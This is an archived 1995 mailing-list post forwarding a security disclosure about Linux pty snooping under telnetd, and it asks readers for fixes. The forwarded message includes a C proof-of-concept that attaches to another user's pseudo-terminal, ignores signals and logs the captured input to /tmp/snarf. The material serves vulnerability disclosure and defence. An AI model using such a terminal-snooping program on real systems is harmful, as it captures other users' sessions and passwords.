[Prev][Next][Index]
Linux tty Surfing ... any1 had problems with it ?!
Got this on the mail,
did anyone had any problems with it ?
Any known fixes ?
Forwarded message:
> Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id CAA26655
> (8.6.12/IDA-1.6); Wed, 27 Sep 1995 02:58:06 +1000
> Received: (majordom@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10939 for best-of-security-outgoing; Tue, 26 Sep 1995 23:08:07 +1000
> Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA10930 for best-of-security; Tue, 26 Sep 1995 23:07:49 +1000
> Date: Tue, 26 Sep 1995 23:07:49 +1000
> From: Julian Assange <proff@suburbia.net>
> Message-Id: <199509261307.XAA10930@suburbia.net>
> To: best-of-security@suburbia.net
> Subject: BoS: linux tty surfing
> Sender: owner-best-of-security@suburbia.net
> Errors-to: nobody@connect.com.au
> Reply-To: nobody@connect.com.au
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
>
> Hi all,
>
> I've done some more testing on this, and got the following results
> with 1.2.10 (yeah, I'm not really on the bleeding edge):
>
> * telnetd as of NetKit-0.5 does not protect you from anyone
> snooping on your pty. I guess we know that by now.
> There's some code in sys_term.c that does a vhangup on the
> pty, but it's commented out for Linux. The comment says that
> this appears to be buggy
>
> * Using login from util-linux-2.2 helps a bit. If you do a
> cat /dev/ttyp0, it will terminate once login is executed by
> telnetd. That's because login *does* do a vhangup.
>
> * Unfortunately, this is not the end of it. I experimented
> a little, and found that a program that ignores all signals
> *and* makes the pty its controlling tty will happily live on,
> and is still able to read data from it. I'm including it
> below.
>
> What I do not understand is why this does not make telnetd
> fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
> this stuff may be able to shed some light on this (Ted?).
>
> Olaf
> - --
> Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
> okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
> For my PGP public key, finger okir@brewhq.swb.de.
> - ------------------------------------------------------------------
> /*
> * simple test program for. Not my usual standard of coding...
> */
> #include <stdio.h>
> #include <unistd.h>
> #include <signal.h>
> #include <termios.h>
> #include <sys/types.h>
> #include <sys/fcntl.h>
>
> int
> main(int argc, char **argv)
> {
> char buffer[256];
> FILE *fp;
> int fd, i, n;
>
> for (i = 0; i < 256; i++)
> close(i);
> setsid();
> if ((fd = open(argv[1], O_RDWR)) < 0) {
> perror("open");
> return 2;
> }
> if (ioctl(fd, TIOCSCTTY, NULL) < 0)
> perror("ioctl");
> if ((fp = fopen("/tmp/snarf", "w")) == NULL)
> return 2;
> for (i = 0; i < 32; i++)
> signal(i, SIG_IGN);
> while ((n = read(fd, buffer, 255)) > 0) {
> buffer[n] = 0;
> fprintf(fp, "got %s\n", buffer);
> }
> perror("read");
> return 2;
> }
>
> --
>
>
> did I say, "dumb."
>
--
Oren Poleg, Work: (972)-3-5750570
System Administrator Home: (972)-9-919678
Euronet Communications http://www.euronet.co.il/~poleg
Public key available on finger